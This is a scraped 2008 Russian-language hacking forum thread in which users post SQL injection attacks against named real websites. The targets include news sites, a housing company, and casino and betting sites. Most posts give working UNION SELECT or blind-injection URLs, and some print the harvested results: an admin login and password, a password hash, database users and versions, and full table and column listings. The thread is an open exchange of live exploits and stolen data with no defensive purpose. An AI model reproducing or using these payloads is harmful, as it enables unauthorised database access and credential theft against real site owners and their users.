13.07.2008, 16:06
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами:
9625938
Репутация:
32
|
|
Код:
http://www.mxmaster.kharkov.ua/index.php?mode=view_full&mx_news_id=101+UNION+SELECT+1,2,concat(mx_username,0x3a,mx_password),4,5,6,7+FROM+mxmaster_mxmasterdb.mx_admin+LIMIT+1,2/*
root:123123
неподходит 
http://www.mxmaster.kharkov.ua/admin
Последний раз редактировалось DJ ][akep; 13.07.2008 в 16:09..
|
|
|
13.07.2008, 20:08
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
С нами:
9769519
Репутация:
415
|
|
ООО "Жилищный капитал", г. Волгоград
Код:
http://www.jk-nbik.ru/?alias=show&id=260'
Код:
http://www.jk-nbik.ru/?alias=show&id=260+AND+1%3Cascii(substring((SELECT+table_name+FROM+information_schema.tables+limit+1,1),1,1))
Код:
http://www.jk-nbik.ru/?alias=show&id=256++AND+1%3Cascii(substring((SELECT+column_name+FROM+information_schema.columns+WHERE+table_name+like+char(105,109,103,101,115)+limit+1,1),1,1))
VERSION(): 5.0.51a-community-log
USER: lipnbikr_sergio@localhost
DATABASE(): lipnbikr_jk
Список таблиц и колонок:
Код:
************************************
LLN_catalog
-----------------------------------
id
name
abc
sort
************************************
LLN_check
-----------------------------------
check_id
ch_date
etap
id
proverok
send
status
************************************
LLN_info
-----------------------------------
id
info
************************************
LLN_letters
************************************
LLN_links
-----------------------------------
add_date
backlink
banner
cat
cy
host
id
link
mail
status
************************************
LLN_modules
-----------------------------------
name
sort
************************************
LLN_mylinks
-----------------------------------
id
link
type
***********************************
LLN_values
-----------------------------------
name
value
value_date
value_int
************************************
imges
------------------------------------
Id
************************************
novostroy
------------------------------------
area
building_descr
city
course_usd
direction
highway
how_far
how_far1
how_fast
id
location
location1
obj_rur
obj_usd
obn_descr
obn_link
obn_photo
obn_time
obn_type
org_logo
org_name
orient
phone
price_rur
price_usd
************************************
ut_cities
------------------------------------
c_direction
c_distance
c_id
c_name
c_sort
************************************
ut_img
------------------------------------
active
Descr
Id
ParentID
type
************************************
ut_news
------------------------------------
Data
Descr1
Descr2
Header
Id
img
imgs
isPublic
Press
status
************************************
ut_section
------------------------------------
Alias
isInMap
isInMenu
isPublic
isSearch
Links
MOrderIndex
MParentID
OrderIndex
ParentID
SectionID
************************************
ut_sectiondata
------------------------------------
Content
Descr
Header
Keywords
LangID
mtime
SectionID
Title
************************************
ut_zm
------------------------------------
c_direction
c_distance
c_id
c_name
c_sort
************************************
|
|
|
|
13.07.2008, 20:37
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user (),version(),database())
таблиц 150+, ничего интересного в первых 35 не увидел, кроме "adminsmail_start"
если интересно кому - попробуйте до конца её =)
|
|
|
|
13.07.2008, 20:59
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
Freescience.info - PR 5
http://www.freescience.info/go.php?pagename=books&id=-620+union+select+1,2,3,4,5,6,concat(user(),char(58 ),version(),char(58),database()),8,9,0,11,12,13,14 ,15,16,17--
Design.lookmy.info - PR 4
http://design.lookmy.info/index.php?id=401&show=news&newsid=-15406+union+select+user_id,username,user_password+ from+firstline_base.2103_forum_users+limit+1,1--
Calcutta
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,logi n,pass)+from+mp_xteam.users
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user name,user_password)+from+mp_xteam.phpbb_users+limi t+1,1
Последний раз редактировалось sabe; 17.07.2008 в 19:24..
|
|
|
|
14.07.2008, 05:44
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
С нами:
9483229
Репутация:
1160
|
|
Код:
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,4/*
Код:
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,table_name+from+information_schema.tables+limit+21,10/*
-------------------------------------------------
Код:
http://www.icewarm.com.au/page.php?pIion+select+1,2,3+users/*
Version:4
Последний раз редактировалось DDoSька; 14.07.2008 в 05:47..
|
|
|
|
14.07.2008, 07:51
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,password+from+punbb_users+lim it+1,1/*
a1881700b14820a22f6712400f49cb3536fd7dcb
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,username+from+punbb_users+lim it+1,1/*
http://forum.gafgaf.ru
http://www.icewarm.com.au/page.php?pId=81+union+select+1,2,3+from+mysql.admi n/*
PHP код:
1142: SELECT command denied to user 'dbwwwadmin'@'localhost' for table 'admin'
|
|
|
|
14.07.2008, 14:16
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
http://www.fondsk.ru/article.php?id=1' вот что! Версия 5 порылся в информатион схеме нашел в таблице person 2 поля login(http://www.fondsk.ru/article.php?id=1+union+select+1,2,3,4,5,concat(tab le_name,0x3a,COLUMN_NAME),7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x706572736f6e+lim it+1,1/*) и mail(ссылку потерял : ( ) ! Пасворда найти не удалось!!! person,author,subscriber воть еще ! Больше нече пдазрительного найти не удалось!
|
|
|
|
14.07.2008, 18:12
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
С нами:
9387494
Репутация:
36
|
|
Как грицо Пришел,увидел,по*мел !!! ВОть http://www.stumptuous.com
ВОть http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+table_name,2+from+information_schem a.tables/*
ну и воть : http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+column_name,2+from+information_sche ma.columns+where+table_name=0x617574686f7220/*
Пас и логин думаю узнать моно за 1 мин! Я не стал! ИМХО бегу в магаз за пивом)
|
|
|
|
14.07.2008, 18:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
BanQui
Рекоммендую для изучения:
Обновлённый антибоян
http://constant1ne.by.ru/sqls.html
И первый пост этой темы
Очень занимательное чтиво
|
|
|
|
14.07.2008, 19:46
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
_www.silversandscasino.com
http://www.silversandscasino.com/silver.asp?goto=1'+or+1=@@version--
http://www.silversandscasino.com/silver.asp?goto=1'%20or%201=(SELECT+TOP+1+email+FR OM+cdrequests+where+id=2000)--
_www.wagerweb.com
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,5, 6/*
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,aes_de crypt(aes_encrypt(concat_ws(0x3a,user(),version(), database()),0x71),0x71),4,5,6/*
root@localhost:5.0.15-nt:sitesmanager2 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для DJ ][akep](/avatars/avatar48987.jpg?771303){kind=avatar}
Комбинированный вид
